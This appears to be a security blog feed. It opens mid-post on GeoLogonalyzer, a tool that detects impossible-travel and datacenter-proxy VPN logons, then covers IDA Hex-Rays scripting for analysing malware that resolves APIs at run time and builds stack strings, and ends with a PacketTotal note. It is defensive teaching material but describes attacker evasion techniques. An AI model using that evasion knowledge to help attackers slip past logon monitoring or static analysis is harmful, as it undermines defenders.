For example, if a user account, Meghan, logged on from New York City, New York on 2017-11-24 at 10:00:00 UTC and then logged on from Los Angeles, California 10 hours later on 2017-11-24 at 20:00:00 UTC, that is roughly a 2,450 mile change over 10 hours. Meghan’s logon source change can be normalized to 245 miles per hour which is reasonable through commercial airline travel.

If a second user account, Harry, logged on from Dallas, Texas on 2017-11-25 at 17:00:00 UTC and then logged on from Sydney, Australia two hours later on 2017-11-25 at 19:00:00 UTC, that is roughly an 8,500 mile change over two hours. Harry’s logon source change can be normalized to 4,250 miles per hour, which is likely infeasible with modern travel technology.

By focusing on the changes in logon sources, analysts do not have to manually review the many times that Harry might have logged in from Dallas before and after logging on from Sydney.

Cloud Data Hosting Provider Analysis

Attackers understand that organizations may either be blocking or looking for connections from unexpected locations. One solution for attackers is to establish a proxy on either a compromised server in another country, or even through a rented server hosted in another country by companies such as AWS, DigitalOcean, or Choopa.

Fortunately, GitHub user “client9” tracks many datacenter hosting providers in an easily digestible format. With this information, we can attempt to detect attackers utilizing a datacenter proxy to thwart GeoFeasibility analysis.

Using GeoLogonalyzer

Usable Log Sources

GeoLogonalyzer is designed to process remote access platform logs that include a timestamp, username, and source IP. Applicable log sources include, but are not limited to:

  1. VPN
  2. Email client or web applications
  3. Remote desktop environments such as Citrix
  4. Internet-facing applications

Usage

GeoLogonalyzer’s built-in --csv input type accepts CSV formatted input with the following considerations:

  1. Input must be sorted by timestamp.
  2. Input timestamps must all be in the same time zone, preferably UTC, to avoid seasonal changes such as daylight savings time.
  3. Input format must match the following CSV structure – this will likely require manually parsing or reformatting existing log formats:

YYYY-MM-DD HH:MM:SS, username, source IP, optional source hostname, optional VPN client details

GeoLogonalyzer’s code comments include instructions for adding customized log format support. Due to the various VPN log formats exported from VPN server manufacturers, version 1.0 of GeoLogonalyzer does not include support for raw VPN server logs.

GeoLogonalyzer Usage

Example Input

Figure 1 represents an example input VPNLogs.csv file that recorded eight authentication events for the two user accounts Meghan and Harry. The input data is commonly derived from logs exported directly from an application administration console or SIEM.  Note that this example dataset was created entirely for demonstration purposes.


Figure 1: Example GeoLogonalyzer input

Example Windows Executable Command

GeoLogonalyzer.exe --csv VPNLogs.csv --output GeoLogonalyzedVPNLogs.csv

Example Python Script Execution Command

python GeoLogonalyzer.py --csv VPNLogs.csv --output GeoLogonalyzedVPNLogs.csv

Example Output

Figure 2 represents the example output GeoLogonalyzedVPNLogs.csv file, which shows relevant data from the authentication source changes (highlights have been added for emphasis and some columns have been removed for brevity):


Figure 2: Example GeoLogonalyzer output

Analysis

In the example output from Figure 2, GeoLogonalyzer helps identify the following anomalies in the Harry account’s logon patterns:

  1. FAST - For Harry to physically log on from New York and subsequently from Australia in the recorded timeframe, Harry needed to travel at a speed of 4,297 miles per hour.
  2. DISTANCE – Harry’s 8,990 mile trip from New York to Australia might not be expected travel.
  3. DCH – Harry’s logon from Australia originated from an IP address associated with a datacenter hosting provider.
  4. HOSTNAME and CLIENT – Harry logged on from different systems using different VPN client software, which may be against policy.
  5. ASN – Harry’s source IP addresses did not belong to the same ASN. Using ASN analysis helps cut down on reviewing logons with different source IP addresses that belong to the same provider. Examples include logons from different campus buildings or an updated residential IP address.

Manual analysis of the data could also reveal anomalies such as:

  1. Countries or regions where no business takes place, or where there are no employees located
  2. Datacenters that are not expected
  3. ASN names that are not expected, such as a university
  4. Usernames that should not log on to the service
  5. Unapproved VPN client software names
  6. Hostnames that are not part of the environment, do not match standard naming conventions, or do not belong to the associated user

While it may be impossible to determine if a logon pattern is malicious based on this data alone, analysts can use GeoLogonalyzer to flag and investigate potentially suspicious logon activity through other investigative methods.
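The GeoFeasibility arithmetic above (distance between consecutive logon sources, divided by the time between them), the CSV input layout from the Usage section and the FAST, DISTANCE and DCH flags from the Analysis section can be put together in a few dozen lines. The following Python is an added example written for this post, not GeoLogonalyzer's own code: it uses a constructed lookup table in place of the MaxMind database, a constructed CIDR list in place of the client9 datacenter list, assumed FAST and DISTANCE thresholds, the (0, 0) default for RFC1918 sources that the Limitations section describes, and a `skip_rfc1918` switch mirroring the --skip_rfc1918 option. The sample log reuses the Meghan and Harry scenarios and is constructed for demonstration.

```python
import ipaddress
import math
from datetime import datetime

EARTH_RADIUS_MILES = 3958.8

# Assumed thresholds for this example (not the project's defaults).
FAST_MPH = 500.0      # faster than scheduled commercial air travel
FAR_MILES = 2000.0    # a trip long enough to deserve a second look

# Default the post describes: reserved sources are placed at (0, 0).
RESERVED_IP_COORDINATES = (0.0, 0.0)
RFC1918_NETS = [ipaddress.ip_network(n)
                for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed stand-in for a GeoIP database: source IP -> (label, lat, lon).
GEOIP = {
    "198.51.100.20": ("New York", 40.7128, -74.0060),
    "198.51.100.30": ("Los Angeles", 34.0522, -118.2437),
    "192.0.2.40": ("Dallas", 32.7767, -96.7970),
    "203.0.113.50": ("Sydney", -33.8688, 151.2093),
}
# Constructed stand-in for a datacenter hosting provider range list.
DATACENTER_NETS = [ipaddress.ip_network("203.0.113.0/24")]

# Constructed input in the CSV layout the post specifies: sorted, all UTC.
SAMPLE_LOG = """\
2017-11-24 10:00:00, Meghan, 198.51.100.20
2017-11-24 20:00:00, Meghan, 198.51.100.30
2017-11-25 17:00:00, Harry, 192.0.2.40
2017-11-25 19:00:00, Harry, 203.0.113.50
2017-11-25 21:00:00, Harry, 10.1.2.3
"""


def haversine_miles(lat1, lon1, lat2, lon2):
    """Great-circle distance in statute miles."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlam = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2
    return 2 * EARTH_RADIUS_MILES * math.asin(math.sqrt(a))


def is_rfc1918(addr):
    return any(addr in net for net in RFC1918_NETS)


def locate(ip):
    """Return (label, lat, lon, is_datacenter) for a source address."""
    addr = ipaddress.ip_address(ip)
    if is_rfc1918(addr):
        return ("RFC1918", RESERVED_IP_COORDINATES[0], RESERVED_IP_COORDINATES[1], False)
    label, lat, lon = GEOIP.get(ip, ("unknown",) + RESERVED_IP_COORDINATES)
    return (label, lat, lon, any(addr in net for net in DATACENTER_NETS))


def analyze(csv_text, skip_rfc1918=False):
    """Emit one finding per change of source IP for a user, scored by distance and speed."""
    last = {}        # user -> (timestamp, ip, lat, lon, label)
    findings = []
    for line in csv_text.splitlines():
        if not line.strip():
            continue
        ts_text, user, ip = [f.strip() for f in line.split(",")[:3]]
        if skip_rfc1918 and is_rfc1918(ipaddress.ip_address(ip)):
            continue     # --skip_rfc1918 behaviour: drop the record entirely
        ts = datetime.strptime(ts_text, "%Y-%m-%d %H:%M:%S")
        label, lat, lon, dch = locate(ip)
        prev = last.get(user)
        last[user] = (ts, ip, lat, lon, label)
        if prev is None or prev[1] == ip:
            continue     # first sighting, or no change of source: nothing to score
        miles = haversine_miles(prev[2], prev[3], lat, lon)
        hours = (ts - prev[0]).total_seconds() / 3600.0
        mph = miles / hours if hours > 0 else float("inf")
        flags = []
        if mph > FAST_MPH:
            flags.append("FAST")
        if miles > FAR_MILES:
            flags.append("DISTANCE")
        if dch:
            flags.append("DCH")
        findings.append({"user": user, "from": prev[4], "to": label,
                         "miles": round(miles), "hours": hours,
                         "mph": round(mph), "flags": flags})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

Harry's third record, from a 10.x address, shows the caveat from the Limitations section: with the default (0, 0) coordinates the hop from Sydney to the reserved address is scored as a huge, impossibly fast trip, so either set the reserved coordinates to the office location or skip RFC1918 sources and accept the blind spot.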

GeoLogonalyzer Limitations

Reserved Addresses

Any RFC1918 source IP addresses, such as 192.168.X.X and 10.X.X.X, will not have a physical location registered in the MaxMind database. By default, GeoLogonalyzer will use the coordinates (0, 0) for any reserved IP address, which may alter results. Analysts can manually edit these coordinates, if desired, by modifying the RESERVED_IP_COORDINATES constant in the Python script.

Setting this constant to the coordinates of your office location may provide the most accurate results, although may not be feasible if your organization has multiple locations or other point-to-point connections.

GeoLogonalyzer also accepts the parameter --skip_rfc1918, which will completely ignore any RFC1918 source IP addresses and could result in missed activity.

Failed Logon and Logoff Data

It may also be useful to include failed logon attempts and logoff records with the log source data to see anomalies related to source information of all VPN activity. At this time, GeoLogonalyzer does not distinguish between successful logons, failed logon attempts, and logoff events. GeoLogonalyzer also does not detect overlapping logon sessions from multiple source IP addresses.

False Positive Factors

Note that the use of VPN or other tunneling services may create false positives. For example, a user may access an application from their home office in Wyoming at 08:00 UTC, connect to a VPN service hosted in Georgia at 08:30 UTC, and access the application again through the VPN service at 09:00 UTC. GeoLogonalyzer would process this application access log and detect that the user account required a FAST travel rate of roughly 1,250 miles per hour which may appear malicious. Establishing a baseline of legitimate authentication patterns is recommended to understand false positives.

Reliance on Open Source Data

GeoLogonalyzer relies on open source data to make cloud hosting provider determinations. These lookups are only as accurate as the available open source data.

Preventing Remote Access Abuse

Understanding that no single analysis method is perfect, the following recommendations can help security teams prevent the abuse of remote access platforms and investigate suspected compromise.

  1. Identify and limit remote access platforms that allow access to sensitive information from the Internet, such as VPN servers, systems with RDP or SSH exposed, third-party applications (e.g., Citrix), intranet sites, and email infrastructure.
  2. Implement a multi-factor authentication solution that utilizes dynamically generated one-time use tokens for all remote access platforms.
  3. Ensure that remote access authentication logs for each identified access platform are recorded, forwarded to a log aggregation utility, and retained for at least one year.
  4. Whitelist IP address ranges that are confirmed as legitimate for remote access users based on baselining or physical location registrations. If whitelisting is not possible, blacklist IP address ranges registered to physical locations or cloud hosting providers that should never legitimately authenticate to your remote access portal.
  5. Utilize either SIEM capabilities or GeoLogonalyzer.py to perform GeoFeasibility analysis of all remote access on a regular frequency to establish a baseline of accounts that legitimately perform unexpected logon activity and identify new anomalies. Investigating anomalies may require contacting the owner of the user account in question. FireEye Helix analyzes live log data for all techniques utilized by GeoLogonalyzer, and more!

Download GeoLogonalyzer today.

Acknowledgements

Christopher Schmitt, Seth Summersett, Jeff Johns, and Alexander Mulfinger.

Solving Ad-hoc Problems with Hex-Rays API

Introduction

IDA Pro is the de facto standard when it comes to binary reverse engineering. Besides being a great disassembler and debugger, it is possible to extend it and include a powerful decompiler by purchasing an additional license from Hex-Rays. The ability to switch between disassembled and decompiled code can greatly reduce the analysis time.

The decompiler (from now on referred to as Hex-Rays) has been around for a long time and has achieved a good level of maturity. However, there seems to be a lack of concise and complete resources on this topic (tutorials or otherwise). In this blog, we aim to close that gap by showcasing examples where scripting Hex-Rays goes a long way.

Overview of a Decompiler

In order to understand how the decompiler works, it’s helpful to first review the normal compilation process.

Compilation and decompilation center around the concept of an Abstract Syntax Tree (AST). In essence, a compiler takes the source code, splits it into tokens according to a grammar, then these tokens are grouped into logical expressions. In this phase of the compilation process, referred to as parsing, the code structure is represented as a complex object, the AST. From the AST, the compiler will produce assembly code for the specified platform.

A decompiler takes the opposite route. From the given assembly code, it works back to produce an AST, and from this to produce pseudocode.

Of all the intermediate steps between code and assembly, we stress the AST so much because most of the time you spend using the Hex-Rays API, you will actually be reading and/or modifying the Abstract Syntax Tree (or ctree in Hex-Rays terminology).

Items, Expressions and Statements

Now we know that Hex-Rays’s ctree is a tree-like data structure. The nodes of this tree are either of type cinsn_t or cexpr_t. We will define these in a moment, but for now it is important to know that both derive from a very basic type, namely the citem_t type, as seen in the following code snippet:

Therefore, all nodes in the ctree will have the op property, which indicates the node type (variable, number, logical expression, etc.).

The type of op (ctype_t) is an enumeration where all constants are named either cit_<xyz> (for statements) or cot_<xyz> (for expressions). Keep this in mind, as it will be very important. A quick way to inspect all ctype_t constants and their values is to execute the following code snippet:

This produces the following output:

Let’s dive a bit deeper and explain the two types of nodes: expressions and statements.

It is useful to think about expressions as the “the little logical elements” of your code. They range from simple types such as variables, strings or numerical constants, to small code constructs (assignments, comparisons, additions, logical operations, array indexing, etc.).

These are of type cexpr_t, a large structure containing several members. The members that can be accessed depend on its op value. For example, the member n to obtain the numeric value only makes sense when dealing with constants.

On the other side, we have statements. These correlate roughly to language keywords (if, for, do, while, return, etc.). Most of them are related to control flow and can be thought of as “the big picture elements” of your code.

Recapitulating, we have seen how the decompiler exposes this tree-like structure (the ctree), which consists of two types of nodes: expressions and statements. In order to extract information from or modify the decompiled code, we have to interact with the ctree nodes via methods dependent on the node type. However, the following question arises: “How do we reach the nodes?”

This is done via a class exposed by Hex-Rays: the tree visitor (ctree_visitor_t). This class has two virtual methods, visit_insn and visit_expr, that are executed when a statement or expression is found while traversing the ctree. We can create our own visitor classes by inheriting from this one and overriding the corresponding methods.

Example Scripts

In this section, we will use the Hex-Rays API to solve two real-world problems:

  • Identify calls to GetProcAddress to dynamically resolve Windows APIs, assigning the resulting address to a global variable.
  • Display assignments related to stack strings as characters instead of numbers, for easier readability.

GetProcAddress

The first example we will walk through is how to automatically handle renaming global variables that have been dynamically resolved at run time. This is a common technique malware uses to hide its capabilities from static analysis tools. An example of dynamically resolving global variables using GetProcAddress is shown in Figure 1.


Figure 1: Dynamic API resolution using GetProcAddress

There are several ways to rename the global variables, with the simplest being manual copy and paste. However, this task is very repetitive and can be scripted using the Hex-Rays API.

In order to write any Hex-Rays script, it is important to first visualize the ctree. The Hex-Rays SDK includes a sample, sample5, which can be used to view the current function’s ctree. The amount of data shown in a ctree for a function can be overwhelming. A modified version of the sample was used to produce a picture of a sub-ctree for the function shown in Figure 1. The sub-ctree for the single expression 'dword_1000B2D8 = (int)GetProcAddress(v0, "CreateThread");' is shown in Figure 2.


Figure 2: Sub-ctree for GetProcAddress assignment

With knowledge of the sub-ctree in use, we can write a script to automatically rename all the global variables that are being assigned using this method.

The code to automatically rename all the global variables is shown in Figure 3. The code works by traversing the ctree looking for calls to the GetProcAddress function. Once found, the code takes the name of the function being resolved and finds the global variable that is being set. The code then uses the IDA MakeName API to rename the address to the correct function.


Figure 3: Function renaming global variables

After the script has been executed, we can see in Figure 4 that all the global variables have been renamed to the appropriate function name.


Figure 4: Global variables renamed
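The following is an added example of the same technique, written for this post and not the FLARE script from Figure 3. It assumes the IDA 7.x IDAPython module names (ida_hexrays, ida_name, idc and friends) and adds two checks the basic version needs in practice: the second GetProcAddress argument may be an ordinal (MAKEINTRESOURCE) rather than a string, and the resolved name may already belong to a statically imported function, in which case the global gets a p_ prefix (a naming policy chosen here) and set_name is called with SN_FORCE so it never silently fails. The naming policy is kept in a plain function so it can be tested outside IDA.

```python
"""Rename globals assigned from GetProcAddress() by walking the Hex-Rays ctree.

Added example, not the FLARE script. The ctree walk needs IDA; the naming
policy (derive_global_name) is plain Python and runs outside IDA.
"""
import re

try:                      # IDAPython modules only exist inside IDA
    import ida_hexrays, ida_idaapi, ida_kernwin, ida_name, idc
    IN_IDA = True
except ImportError:
    IN_IDA = False

TARGET = "GetProcAddress"


def derive_global_name(api, taken=frozenset()):
    """Pick an IDA name for a pointer filled by GetProcAddress(h, api).

    api is the second argument as seen in the ctree: a str/bytes name, or an
    int when the sample resolves by ordinal (MAKEINTRESOURCE, i.e. < 0x10000).
    `taken` holds names already used elsewhere in the database, so a global
    never steals the name of a statically imported function (p_ prefix is
    this example's convention).
    """
    if isinstance(api, int):
        if not 0 < api < 0x10000:
            return None                        # not an ordinal, leave it alone
        base = "ordinal_%d" % api
    else:
        if isinstance(api, bytes):
            api = api.decode("ascii", "replace")
        base = re.sub(r"[^A-Za-z0-9_]", "_", api.strip())
        if not base:
            return None
        if base[0].isdigit():
            base = "_" + base                  # IDA names cannot start with a digit
    return "p_" + base if base in taken else base


if IN_IDA:
    def _strip_casts(e):
        while e.op == ida_hexrays.cot_cast:    # e.g. `(int)GetProcAddress(...)`
            e = e.x
        return e

    class ResolvedApiVisitor(ida_hexrays.ctree_visitor_t):
        """Collects (global_ea, api) for each `dword_X = GetProcAddress(h, api)`."""

        def __init__(self):
            ida_hexrays.ctree_visitor_t.__init__(self, ida_hexrays.CV_FAST)
            self.found = []

        def visit_expr(self, e):
            if e.op == ida_hexrays.cot_asg and e.x.op == ida_hexrays.cot_obj:
                call = _strip_casts(e.y)
                if (call.op == ida_hexrays.cot_call
                        and call.x.op == ida_hexrays.cot_obj
                        and call.a.size() == 2
                        and ida_name.get_name(call.x.obj_ea).replace("__imp_", "") == TARGET):
                    arg = _strip_casts(call.a[1])
                    if arg.op == ida_hexrays.cot_obj:      # lpProcName -> C string
                        api = idc.get_strlit_contents(arg.obj_ea)
                    elif arg.op == ida_hexrays.cot_num:    # MAKEINTRESOURCEA(ordinal)
                        api = arg.numval()
                    else:
                        api = None                         # built at run time, skip
                    if api is not None:
                        self.found.append((e.x.obj_ea, api))
            return 0                                       # keep walking

    def rename_resolved_globals(ea=None):
        """Decompile the function at ea (default: cursor) and rename its globals."""
        cfunc = ida_hexrays.decompile(ea if ea is not None else ida_kernwin.get_screen_ea())
        if cfunc is None:
            return 0
        visitor = ResolvedApiVisitor()
        visitor.apply_to(cfunc.body, None)
        renamed = 0
        for gea, api in visitor.found:
            name = derive_global_name(api)
            if name is None:
                continue
            owner = ida_name.get_name_ea(ida_idaapi.BADADDR, name)
            if owner not in (ida_idaapi.BADADDR, gea):     # name belongs to something else
                name = derive_global_name(api, taken={name})
            # SN_FORCE appends a numeric suffix if even that name is already taken
            if ida_name.set_name(gea, name, ida_name.SN_NOWARN | ida_name.SN_FORCE):
                renamed += 1
        return renamed

    if __name__ == "__main__":
        print("renamed %d globals" % rename_resolved_globals())
```

Run it from File > Script file with the cursor inside the resolver function. Because it only visits one decompiled function, call rename_resolved_globals() for each function that performs resolution; calls that go through a thunk named GetProcAddress in .text are matched as well as direct calls through the import table.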

Stack Strings

Our next example is a typical issue when dealing with malware: stack strings. This is a technique aimed at making analysis harder by building strings from individual characters in the code instead of using string literals. An example can be seen in Figure 5; the malware stores each character’s ASCII value on the stack and then references the buffer in the call to sprintf. At first glance, it is very difficult to say what this string means (unless, of course, you know the ASCII table by heart).


Figure 5: Hex-Rays decompiler output. Stack strings are difficult to read.

Our script will modify these assignments to something more readable. The important part of our code is the ctree visitor mentioned earlier, which is shown in Figure 6.


Figure 6: Custom ctree visitor

The logic implemented here is pretty straightforward. We define our subclass of a ctree visitor (line 1) and override its visit_expr method, which is called for every expression in the tree. The interesting code only kicks in when an assignment is found (line 9). Another condition to be met is that the left side of the assignment is a variable and the right side a number (line 15). Moreover, the numeric value must be in the readable ASCII range (lines 20 and 21).

Once this kind of expression is found, we will change the type of the right side from a number to a string (lines 26 to 31), and replace its numerical value by the corresponding ASCII character (line 32).

The modified pseudocode after running this script is shown in Figure 7.


Figure 7: Assigned values shown as characters
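Below is an added example that goes a step further than the visitor in Figure 6; it is written for this post and is not the FLARE script. Instead of rewriting each numeric literal into a character, it collects every `stack_var = immediate` write, joins adjacent stack slots into whole strings and attaches each recovered string as a decompiler comment on the statement that writes its first byte. That also covers two cases the per-character rewrite misses: compilers that pack several characters into one 4-byte immediate (little-endian, as on x86), and UTF-16 strings written as 16-bit immediates. It assumes the IDA 7.x IDAPython module names; the merging logic is plain Python, and the sample write list is constructed here to stand in for what the visitor would collect from a function like the one in Figure 5.

```python
"""Recover whole stack strings from a Hex-Rays ctree.

Added example, not the FLARE script. merge_stack_strings() is plain Python
and runs outside IDA; the visitor and the commenting need IDA.
"""
try:                       # IDAPython modules only exist inside IDA
    import ida_hexrays, ida_kernwin
    IN_IDA = True
except ImportError:
    IN_IDA = False

PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


def _decode_run(start, buf, min_len):
    """Turn one contiguous byte run into a list of (offset, text) strings."""
    while buf.endswith(b"\x00\x00"):        # drop a wide (UTF-16) NUL terminator
        buf = buf[:-2]
    # UTF-16LE heuristic: every high byte is zero, every low byte printable
    if len(buf) >= 2 * min_len and len(buf) % 2 == 0 and all(
            buf[i] == 0 and buf[i - 1] in PRINTABLE for i in range(1, len(buf), 2)):
        return [(start, buf.decode("utf-16-le"))]
    out, pos = [], 0
    for piece in buf.split(b"\x00"):        # NUL-separated ASCII pieces
        if len(piece) >= min_len and all(b in PRINTABLE for b in piece):
            out.append((start + pos, piece.decode("ascii")))
        pos += len(piece) + 1
    return out


def merge_stack_strings(writes, min_len=2):
    """writes: iterable of (stack_offset, size_in_bytes, immediate), in any order.
    Immediates are laid out little-endian. Returns [(offset, text)] sorted by
    offset; runs that are not printable or shorter than min_len are dropped."""
    found, start, buf = [], None, b""
    for off, size, value in sorted(writes):
        chunk = (value & ((1 << (8 * size)) - 1)).to_bytes(size, "little")
        if start is None or off != start + len(buf):    # gap: flush current run
            if buf:
                found.extend(_decode_run(start, buf, min_len))
            start, buf = off, b""
        buf += chunk
    if buf:
        found.extend(_decode_run(start, buf, min_len))
    return found


# Constructed input: what the visitor below would collect from a function that
# builds "cmd.exe" byte by byte, "GET /x" as a packed dword + word, the wide
# string L"ws2_32" as 16-bit immediates, and one unrelated counter (0x1000).
SAMPLE_WRITES = [
    (-0x19, 1, 0x00), (-0x20, 1, 0x63), (-0x1F, 1, 0x6D), (-0x1E, 1, 0x64),
    (-0x1D, 1, 0x2E), (-0x1C, 1, 0x65), (-0x1B, 1, 0x78), (-0x1A, 1, 0x65),
    (-0x10, 4, 0x20544547), (-0x0C, 2, 0x782F), (-0x0A, 1, 0x00),
    (-0x40, 2, 0x77), (-0x3E, 2, 0x73), (-0x3C, 2, 0x32), (-0x3A, 2, 0x5F),
    (-0x38, 2, 0x33), (-0x36, 2, 0x32), (-0x34, 2, 0x00),
    (-0x04, 4, 0x1000),
]


if IN_IDA:
    class StackWriteVisitor(ida_hexrays.ctree_visitor_t):
        """Collects (stkoff, size, value, ea) for every `stack_var = immediate`.
        Like the visitor in the post it matches cot_var only; indexed writes
        such as `buf[3] = 'c'` (cot_idx) would need a second case."""

        def __init__(self, cfunc):
            ida_hexrays.ctree_visitor_t.__init__(self, ida_hexrays.CV_FAST)
            self.lvars = cfunc.get_lvars()
            self.writes = []

        def visit_expr(self, e):
            if (e.op == ida_hexrays.cot_asg and e.x.op == ida_hexrays.cot_var
                    and e.y.op == ida_hexrays.cot_num):
                lvar = self.lvars[e.x.v.idx]
                if lvar.is_stk_var():            # register vars have no fixed slot
                    self.writes.append((lvar.get_stkoff(), e.x.type.get_size(),
                                        e.y.numval(), e.ea))
            return 0

    def annotate_stack_strings(ea=None):
        """Decompile the function at ea (default: cursor), comment each string."""
        cfunc = ida_hexrays.decompile(ea if ea is not None else ida_kernwin.get_screen_ea())
        visitor = StackWriteVisitor(cfunc)
        visitor.apply_to(cfunc.body, None)
        ea_of = {off: wea for off, _, _, wea in visitor.writes}
        strings = merge_stack_strings((off, sz, val) for off, sz, val, _ in visitor.writes)
        for off, text in strings:
            tl = ida_hexrays.treeloc_t()
            tl.ea = ea_of[max(k for k in ea_of if k <= off)]   # write holding byte 0
            tl.itp = ida_hexrays.ITP_SEMI
            cfunc.set_user_cmt(tl, "stack string: %r" % text)
        cfunc.save_user_cmts()                   # persist comments in the IDB
        return strings

    if __name__ == "__main__":
        for off, text in annotate_stack_strings():
            print("%#x: %r" % (off, text))
```

Comments placed with set_user_cmt survive a decompiler refresh, unlike in-place edits to the ctree, which are lost as soon as the function is decompiled again. The UTF-16 heuristic is just that: a byte buffer such as "A\0B\0" is reported as the wide string "AB", which is the same ambiguity the bytes have in memory.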

You can find the complete scripts in our FLARE GitHub repository under decompiler scripts.

Conclusion

These two admittedly simple examples should give you an idea of the power of IDA’s decompiler API. In this post we have covered the foundation of all decompiler scripts: the ctree object, a structure composed of expressions and statements that represents every element of the code as well as the relationships between them. By creating a custom visitor we have shown how to traverse the tree and read or modify its elements, and therefore how to analyze or modify the pseudocode.

Hopefully, this post will motivate you to start writing your own scripts. This is only the beginning!

Do you want to learn more about these tools and techniques from FLARE? Then you should take one of our Black Hat classes in Las Vegas this summer! Our offerings include Malware Analysis Crash Course, macOS Malware for Reverse Engineers, and Malware Analysis Master Class.

References

Although it was written in 2009, the original article on the Hex-Rays blog is still one of the best references.

PacketTotal

The SANS Internet Storm Center did a diary article on PacketTotal, which you can find here. PacketTotal is a free site where you upload a pcap (up to 50 MB) and the site analyzes it and gives you a console view that flags malicious or suspicious activity as well as a breakdown of HTTP, DNS and other protocols. It also gives you a nice timeline graph showing the packets as they interact, which is really useful. Lastly, if you like graphs, there is an analytics page showing traffic statistics. You can find it at, yes, packettotal.com.